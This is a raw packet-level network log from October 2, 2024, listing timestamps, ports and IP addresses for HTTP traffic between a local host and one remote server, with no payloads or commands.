Oct 2, 2024 18:19:20.780791998 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.818056107 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.818070889 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.818099022 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.818109035 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.818133116 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.818139076 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.818154097 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.818170071 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.818176985 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.818196058 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.818216085 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.818228006 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.818236113 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.818268061 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.818276882 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.818316936 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.818871975 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.818913937 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.818924904 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.818939924 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.818964958 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.818984032 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.819004059 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.819017887 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.819044113 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.819052935 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.819061995 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.819082975 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.819096088 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.819120884 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.819205046 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.819219112 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.819245100 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.819255114 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.819262981 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.819292068 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.819298029 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.819334030 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.819344997 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.819364071 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.819371939 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.819401979 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.819411993 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.819451094 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:20.840337038 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:20.840406895 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:21.187766075 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:21.187799931 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:21.192609072 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:21.192759991 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:21.192792892 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:21.192810059 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:21.192836046 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:22.084887981 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:22.084959984 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:22.171125889 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:22.171202898 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:22.176265001 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:22.176307917 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:22.176502943 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:23.032016039 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:23.032119989 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:23.051656008 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:23.255229950 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:23.996963978 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:23.997055054 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:24.369674921 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:24.374737024 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:25.114274979 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:25.114382982 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:25.922548056 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:25.927565098 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.153538942 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.153613091 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.153625965 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.153661013 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.153704882 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.153892040 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.153901100 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.153908968 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.153935909 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.153975964 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.154107094 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.154122114 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.154136896 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.154166937 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.154198885 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.154258966 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.154274940 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.154294968 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.154309988 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.154311895 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.154335022 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.154371977 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.309375048 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.309397936 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.309406042 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.309412956 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.309420109 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.309427023 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.309434891 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.309520006 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.309534073 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.309549093 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.309564114 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.309575081 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.309580088 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.309595108 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.309611082 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.309631109 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.309648991 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.309669971 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.310225010 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.310240030 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.310254097 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.310269117 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.310283899 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.310283899 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.310297966 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.310309887 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.310317039 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.310326099 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.310353994 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.382102966 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.382201910 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.382755041 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.382810116 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.426044941 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.426069975 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.426084995 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.426100016 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.426115990 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.426129103 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.426153898 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.426162004 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.426170111 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.426193953 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.426218987 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.426268101 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.426282883 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.426297903 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.426304102 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.426312923 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.426321983 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.426328897 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.426340103 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.426359892 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.426367044 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.426567078 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.426582098 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.426611900 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.426620960 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.426644087 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.426659107 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.426673889 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.426681042 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.426688910 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.426697969 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.426702976 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.426717997 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.426719904 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.426732063 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.426733971 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.426754951 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.426765919 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.427088976 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.427103043 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.427128077 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.427153111 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.427175999 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.427191019 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.427206039 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.427212954 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.427221060 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.427231073 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.427236080 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.427241087 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.427249908 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.427258968 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.427263975 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.427272081 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.427279949 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.427289963 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.427301884 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.427320004 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.427531958 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.427547932 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.427570105 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.427581072 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.427717924 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.427732944 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.427746058 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.427757025 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.427761078 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.427768946 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.427776098 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.427788019 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.427791119 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.427802086 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.427804947 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.427817106 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.427819967 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.427834988 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.427839041 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.427848101 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.427850008 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.427862883 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.427867889 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.427880049 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.427880049 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.427896023 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.427898884 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.427917957 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.427943945 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.428364992 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.428380966 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.428406000 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.428421021 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.474678993 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.474750996 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.474812984 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.474843979 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.556796074 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.556837082 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.556852102 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.556875944 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.556890965 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.556894064 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.556907892 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.556915998 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.556922913 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.556938887 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.556946993 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.556966066 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.556989908 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.557015896 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.557048082 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.557054043 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.557085037 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.557142973 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.557157993 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.557180882 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.557194948 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.557260990 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.557281971 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.557296991 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.557297945 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.557310104 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.557318926 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.557326078 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.557336092 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.557342052 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.557360888 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.557369947 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.557385921 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.557455063 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.557471037 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.557487011 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.557533026 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.557533026 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.557555914 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.557571888 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.557598114 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.557621002 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.557682037 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.557698011 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.557729006 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.557811022 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.557846069 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.557852983 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.557858944 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.557874918 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.557888031 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.557897091 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.557903051 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.557913065 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.557918072 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.557930946 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.557951927 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.558006048 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.558022976 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.558042049 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.558047056 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.558070898 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.558089018 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.558155060 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.558171034 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.558183908 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.558197975 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.558204889 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.558211088 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.558212042 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.558226109 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.558229923 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.558239937 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.558262110 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.558268070 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.558276892 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.558284044 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.558298111 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.558309078 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.558311939 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.558326006 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.558327913 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.558341026 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.558345079 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.558370113 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.558393955 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.558732986 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.558748960 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.558769941 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.558799982 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.558811903 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.558815956 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.558830023 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.558837891 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.558845043 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.558854103 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.558860064 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.558871984 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.558873892 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.558891058 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.558891058 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.558907986 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.558931112 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.559128046 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.559142113 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.559155941 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.559168100 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.559170008 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:26.559184074 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:26.559185028 CEST	80	49737	185.215.113.37	192.168.2.4
